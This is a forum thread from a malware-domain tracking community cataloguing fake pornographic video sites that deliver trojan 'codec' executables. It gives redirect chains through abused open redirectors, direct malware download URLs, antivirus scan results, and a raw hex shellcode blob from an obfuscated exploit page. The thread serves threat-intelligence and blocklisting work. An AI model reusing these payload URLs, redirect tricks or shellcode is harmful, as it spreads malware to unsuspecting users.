Malware Domain List

Malware Related => Malicious Domains => Topic started by: ocean on December 14, 2008, 01:36:12 am

Title: fake porntubes
Post by: ocean on December 14, 2008, 01:36:12 am

searching for some samples i've found these:

Code: [Select]

www.chiensderace.com/cgi-bin/awredir/awredir.pl?url=nebeda.com/p/go.php?sid=15&parameter=google+query
www.loftv.com/include/click.php3?idemission=5496&url=HTTP://oplanete.com/s/go.php?sid=2&parameter=google+query
That redirects to:

Code: [Select]

http://alltubesbestcollection.com/teens/xmovie.php?id=1518 (contains explicit images)
that links to:

Code: [Select]

http://codecdownload.3d-softwareportal.com/exclusivemovie.0.exe

novirusthanks report:

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found! 
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan.Win32.Agent.auqs   A
IkarusT3 - Nothing found!
Kaspersky - Trojan.Win32.Agent.auqs
McAfee - Nothing found! 
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found! 
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!   
Virus Buster - Nothing found!

Scan report generated by 
NoVirusThanks.org (http://novirusthanks.org)


also a search in google shows these results:

Code: [Select]

holoholo.org/cgi_bin/redirect.pl?url=HTTP://nebeda.com/p/go.php?sid=13&parameter=Hana+P.+clips
www.stuartmorris.id.au/cgi-bin/awredir.pl?url=nebeda.com/p/go.php?sid=15&parameter=Pantie+Ass.Com
www.gotravelinsurance.co.uk/affiliate?tduid=777&url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Arap+Porn
login2.ezproxy.slv.vic.gov.au/login?url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Milf+Fuck.Com
www.gloofi.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Teen+Ligerie
shop.d-nexus.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Girl+Hairy+Hot+Teen
www.fairplaygames.com/redirect.asp?URL=HTTP://nebeda.com/p/go.php?sid=15&parameter=Ass+And+Thighs+Com
shoponline.com.sg/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Friend+Fucking+Husband+Picture+Sexy+Wife
www.realgoods.com/linkshare.do?siteID=1&url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Teen+Finger+In+Ass
acom.wbf.com/Acom/showHTML.asp?URL=HTTP://nebeda.com/p/go.php?sid=7&parameter=Viv+Lesbian
www.atlantaphotos.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Sexy+Condoleezza+Rice+Pic
www.materiel.be/logclic/click.php?id=108&url=HTTP://oplanete.com/s/go.php?sid=9&parameter=Hentai.Com
www.businesstraveller.com/liveobjects/adsystem/go.plm?id=202&url=HTTP://oplanete.com/s/go.php?sid=2&parameter=Trixie+Teen.Com
www.dmjobs.co.uk/jobboard/scripts/vbs/adredirect.asp?b=5787&u=HTTP://oplanete.com/s/go.php?sid=2&parameter=Free+Adult+Erotic+Sex+Story.Com
darwin.eeb.uconn.edu/cgi-bin/awredir.pl?url=oplanete.com/s/go.php?sid=10&parameter=Ebony.Com
www.streetperformance.com/redirect.php?compid=777&banner=REG&catid=&url=oplanete.com/s/go.php?sid=10&parameter=Kerissa+Fare+porn
darwin.eeb.uconn.edu/cgi-bin/awredir.pl?url=sexylesm.ru/go.php?sid=4%26parameter=porn+pl+streem
www.chiensderace.com/cgi-bin/awredir/awredir.pl?url=livehomesearch.com/full/intra-uterine-insemination.html
www.stuartmorris.id.au/cgi-bin/awredir.pl?url=999666999.com/tds.php/719/slave-sucking-shemales-cock
regards
ocean

Title: Re: porntube 2.0
Post by: sowhat-x on December 14, 2008, 01:07:36 pm

Thanks ocean,
these will be added in the list during next update...

Title: Re: porntube 2.0
Post by: ocean on December 14, 2008, 04:28:47 pm

i've got some more ;D

Code: [Select]

http://www.prodestonline.it
we have some javascripts that force the user to download video.exe or to install the activex (it seems that those are removed from the server)

that piece of javascript calls for main.php:

Code: [Select]

<body onbeforeunload="window.open('main.php');" onunload="window.open('main.php');" onclose="window.open('main.php');"  id="mainbody">
main.php is recognised by the antivirus as JS/Zhelatin.zb
decoding with Malzilla antivirus find signature of HTML/Silly.Gen

It seems that Malzilla doesn't decode automatically the second obfuscated JS, probably the shellcode is that:

Code: [Select]

43434343eb0f5b33c966b980018033ef43e2faeb05e8ecffffff7f8b4edfefefef64afe3649ff342649fe76e03efebefef6403b98761a1e1030711efefef66aaebb987771165e1071fefefef66aae7b987ca5f102d070defefef66aae3b98700210f8f073befefef66aaffb9872e960a570729efefef66aafbaf6fd72c9a1566aaf706e8eeefefb1669acb64aaeb85eeb664baf7b90764efefefbf87d9f5c09f0778efefef66aaf3642a6c2fbf66aacf8710efefefbf64aafb85edb664baf7078eefefefecaacf28efb391c18a28afeb978aefef109acf64aae385eeb664baf707afefefef85e8b7ecaacbdc34bcbc109acfbfbc64aaf385eab664baf707ccefefef85ef109acf64aae785edb664baf707ffefefef851064aaff85eeb664baf707efefefefaeb4bdec0eec0eec0eec0e6c03ebb5bc64350d18bd100fba64036492e764b2e3b9649cd3649bf197ec1cb96499cfec1cdc26a6ae42ec2cb9dc19e051ffd51d9be72e21e2ec1daf041ed411b19a0ab5640464b5cbec328964e3a464b5f3ec3264eb64ec2ab1b22de7ef071b111010babda3a2a0a1ef
probably is some kind of IE/ActiveX exploit i'll look into it later and post some others.

regards ocean

Title: Re: porntube 2.0
Post by: ocean on December 14, 2008, 05:02:16 pm

Code: [Select]

http://free-pornnow.com/
follow a link

Code: [Select]

http://free-pornnow.com/out.php?t=1.0.24.11&url=aHR0cDovL2ZpZWxkb25saW5lLm5ldC9pbi5jZ2k/MTU=&link=today&p=100

Code: [Select]

http://fieldonline.net/in.cgi?15
http://hot-fuck-tube-site.net/get.php?id=20582&p=38
http://just-loved-tube.com/xfreeporn.php?id=20582
following one of the links present in the page we can find some malwares or get redirected to other pages

Code: [Select]

http://download-all4free.com/FullBSCodecz.0.exe

Title: Re: fake porntubes
Post by: ocean on December 14, 2008, 05:21:40 pm

Code: [Select]

http://imp-porntube.net/pornmovies.php?id=255following one of the links we get to a page with some obfuscated JS and a link to a malware

Code: [Select]

http://codecdownload.extracoolfiles.com/exclusivemovie.0.exe

deobfuscating the JS we get an embedded object movie.mpg

Code: [Select]

document.getElementById('playMov').innerHTML = '<embed src="/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>'
regards ocean

Title: Re: fake porntubes
Post by: ocean on December 15, 2008, 11:13:04 am

exclusivemovie.0.exe:

Detections

a-squared - Trojan.Win32.Agent!IK
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found! 
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan.Win32.Agent.auqs   A
IkarusT3 - Trojan.Win32.Agent
Kaspersky - Trojan.Win32.Agent.auqs
McAfee - Generic Downloader.x trojan  
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found! 
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!   
Virus Buster - Nothing found!

FullSBZCodecz.0.exe


Detections

a-squared - Trojan-Dropper.Agent!IK
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found! 
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan-Downloader.Win32.Agent.aufz   A
IkarusT3 - Trojan-Dropper.Agent
Kaspersky - Trojan-Downloader.Win32.Agent.aufz
McAfee - Nothing found! 
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - a variant of Win32/Kryptik.CU trojan 
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!   
Virus Buster - Nothing found!

Title: Re: fake porntubes
Post by: ocean on December 17, 2008, 11:02:44 am

update :)

Code: [Select]

http://tubezzz.com/xxx/
File Info

Report generated: 17.12.2008 at 11.54.45 (GMT 1)
Filename: teens_fuck_orgy13.mpeg._xe
File size: 1520 KB
MD5 Hash: 1BE319D57F215B3A0951AD6EECD06B89
SHA1 Hash: 5A318F2E304FE23BF78C1DBAEA23402DAEA1303E
Packer detected: Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
Self-Extract Archive: Nothing found
Binder Detector:  Nothing found
Detection rate: 7 on 24

Detections

a-squared - Generic.Win32.Malware!IK
Avira AntiVir - Nothing found!
Avast - Win32:Trojan-gen {Other} (0)
AVG - :\$JF\xscan.exe Potentially harmful program Fake_AntiSpyware.AQT
BitDefender - Trojan.FakeAlert.ARC
ClamAV - Nothing found!
Comodo - Nothing found! 
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Generic.Win32.Malware
Kaspersky - not-a-virus:FraudTool.Win32.XLGuarder.aw
McAfee - Nothing found! 
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found! 
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Mal/FakeAV-Q
TrendMicro - Nothing found!
VBA32 - Nothing found!   
Virus Buster - Nothing found!

Scan report generated by 
NoVirusThanks.org (http://novirusthanks.org)

Code: [Select]

porntuber.net/watch.php?v=3595067207

Code: [Select]

porntuber.net/download.php redirects to

Code: [Select]

http://xgguy.com/download/wmv9codec.exewich returns a 404 page.

Title: Re: fake porntubes
Post by: ocean on December 17, 2008, 01:12:09 pm

Code: [Select]

http://www.moms-galls.com/following the links the mpeg video links redirects to

Code: [Select]

slyvip.com/v/c.phpwich, at the moment returns a 404.

Code: [Select]

http://porntubenet.com/index.php

Code: [Select]

http://porntubenet.com/download.php redirects to

Code: [Select]

http://porntubenet.com/download/ActiveXVideoCodec.exe

Title: Re: fake porntubes
Post by: ocean on December 19, 2008, 09:25:13 am

update:

temporarily removed

in the chain there are pages that links back to the page that contains the malware, cialis spam pages and others.
i haven't had time to follow every link and parse the data, probably there are a lot more to find out.

images on some of these websites are hosted on

Code: [Select]

http://awmcity.com
regards ocean.

Title: Re: fake porntubes
Post by: MysteryFCM on December 20, 2008, 12:04:36 am

Be very wary if checking some of those as their domain names give a very big hint of C/P

Title: Re: fake porntubes
Post by: ocean on December 20, 2008, 09:18:04 am

you mean carding/phishing?


here's another link chain

Code: [Select]

http://allpornsites.info/gallery1.htm
http://www.qulclipz.com/st/st.php?cat=5509&script=1&url=http%3A%2F%2Fwww.vidzcollector.com%2Fm4%2Findex.php%3Fid%3D1956%26n%3Dmainstream%26a%3Dchids82%26v%3D44888.955555556%26preview%3Dhttp%253A%252F%252Fsimg-2.qulclipz.com%252Fst%252Fthumbs%252F037%252F6563413748.jpg&p=100
http://www.vidzcollector.com/m4/index.php?id=1956&n=mainstream&a=chids82&v=44888.955555556&preview=http%3A%2F%2Fsimg-2.qulclipz.com%2Fst%2Fthumbs%2F037%2F6563413748.jpg
http://www.vidzwares.com/download.php?id=1956
the last link is the "setup.exe" fake video codec.

Title: Re: fake porntubes
Post by: MysteryFCM on December 20, 2008, 04:26:15 pm

Not quite ...... CP = Child Pornography

Title: Re: fake porntubes
Post by: ocean on December 20, 2008, 05:40:43 pm

maybe it's better if i temporarily remove the links.

howewer checked a few of them from where i parsed the links and doesn't seem.

regards
ocean

Title: Re: fake porntubes
Post by: ocean on May 27, 2009, 11:43:48 pm

other fake porntubes :)

Code: [Select]

masevi.net/main.html
xmoviedownloads.com/tube.htm
badwetgirls.com/blah_video.html
thesexybaby.com/bored_video.html


http://signanda.net/download/7953764e4d413d3dfcf24f1a20090516/flash_player_v11.exe
http://anubis.iseclab.org/?action=result&task_id=117a3fd6756b193d4bd9ec5167c8b4e1c

http://www.virustotal.com/en/analisis/d3c4a084fed90e6942c2da016ca0a17807fd748a8bcba19b31179e458dba1ff4-1243479143

Result: 3/40 (7.50%)

Sunbelt    3.2.1858.2    2009.05.28    Trojan.NSIS.DnsChanger (v)

regards ocean